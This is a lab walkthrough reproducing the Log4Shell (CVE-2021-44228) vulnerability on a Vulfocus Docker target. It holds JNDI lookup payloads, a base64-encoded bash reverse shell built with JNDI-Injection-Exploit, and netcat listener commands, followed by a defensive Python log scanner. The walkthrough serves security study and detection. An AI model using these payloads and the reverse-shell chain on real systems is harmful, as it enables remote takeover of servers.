Apache Log4j2 RCE vulnerability reappears
1. Vulnerability introduction
Apache Log4j2 is a Java logging component. In the affected versions, message lookups (including JNDI lookups) are enabled by default, so an attacker-controlled string that reaches a log call can trigger a JNDI lookup and lead to remote code execution.
Affected versions: Apache Log4j 2.x <= 2.15.0.rc1
Vulnerability number: CVE-2021-44228
2. Vulnerability environment construction
Target machine: Ubuntu, IP 192.168.241.129
Attack machine: Kali, IP 192.168.241.128
Since my Ubuntu virtual machine has already been set up with docker, I can directly use the following command to download the vulnerability image.
sudo docker pull vulfocus/log4j2-rce-2021-12-09:latest
After pulling the image, run it locally and expose the service with:
sudo docker run -itd -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest
If you do not have Docker installed, you can use the Vulfocus online range environment instead:
https://github.com/fofapro/vulfocus
After setting up, access the virtual machine IP and port:
http://192.168.241.129:8080
3. Vulnerability recurrence
1. Perform DNSLog verification
Using the DNSLog platform at
https://dig.pm/
obtain a subdomain and construct the payload:
${jndi:ldap://5097bd9c.dns.1433.eu.org}
Click ??? in the browser, capture the request with Burp Suite, and replace the parameter value with the payload. Sending the request as-is causes a server 400 error; the payload must be URL-encoded first.
The DNSLog site then shows the resolution record, confirming that the lookup was triggered.
2. JNDI injection reverse shell
The vulnerability is exploited with JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar from
https://github.com/welk1n/JNDI-Injection-Exploit
Tool usage:
git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
cd JNDI-Injection-Exploit
mvn clean package -DskipTests
The mvn build produces JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar; confirm that Maven is installed before running the mvn command.
Usage:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
Reverse shell command
bash -i >& /dev/tcp/ip/port 0>&1 // needs to be base64-encoded
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0MS4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.241.128
The tool prints five links:
rmi://192.168.241.128:1099/zvrfsf
rmi://192.168.241.128:1099/xwa9m4
ldap://192.168.241.128:1389/xwa9m4
rmi://192.168.241.128:1099/e1twtt
ldap://192.168.241.128:1389/e1twtt
In another terminal, start nc listening on the port:
nc -lvnp 4444 // Kali
nc64.exe -lvnp 4444 // on Windows, run from cmd
Now construct the payload, URL-encode it, and send it with Burp Suite:
${jndi:rmi://192.168.241.128:1099/zvrfsf} // pick any one of the 5 links
The tool's terminal then prints log output showing that the payload was served successfully,
and the nc listener receives the reverse shell.
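As an added, defender-side example (not part of the original write-up): a small Python scanner that URL-decodes web request log lines, since the page notes the payload must be URL-encoded to get past the server, and flags any `${jndi:<scheme>:...}` lookup it finds. The log lines are constructed samples, and the list of JNDI provider schemes checked is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (not taken from the original page).
SAMPLE_LOG = [
    '192.168.241.128 - - "GET /hello?payload=%24%7Bjndi%3Aldap%3A%2F%2F5097bd9c.dns.1433.eu.org%7D HTTP/1.1" 400',
    '192.168.241.128 - - "POST /hello HTTP/1.1" 200 "User-Agent: ${jndi:rmi://192.168.241.128:1099/zvrfsf}"',
    '10.0.0.5 - - "GET /hello?payload=hello%20world HTTP/1.1" 200',
]

# Assumed set of JNDI provider schemes worth alerting on; case-insensitive
# because Log4j's lookup name matching is case-insensitive.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|nis)\s*:", re.IGNORECASE)


def normalize(text, max_rounds=3):
    """URL-decode repeatedly until the text stops changing (handles double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_lookups(line):
    """Return a list of (scheme, lookup_string) pairs found in one decoded log line."""
    decoded = normalize(line)
    hits = []
    for m in JNDI_RE.finditer(decoded):
        # Keep the lookup through its closing brace so the analyst sees the full target.
        end = decoded.find("}", m.end())
        lookup = decoded[m.start():end + 1] if end != -1 else decoded[m.start():]
        hits.append((m.group(1).lower(), lookup))
    return hits


def scan(lines):
    """Scan many lines; returns (line_index, (scheme, lookup)) for every hit."""
    return [(i, hit) for i, line in enumerate(lines) for hit in find_jndi_lookups(line)]


if __name__ == "__main__":
    for idx, (scheme, lookup) in scan(SAMPLE_LOG):
        print(f"line {idx}: JNDI lookup via {scheme}: {lookup}")
```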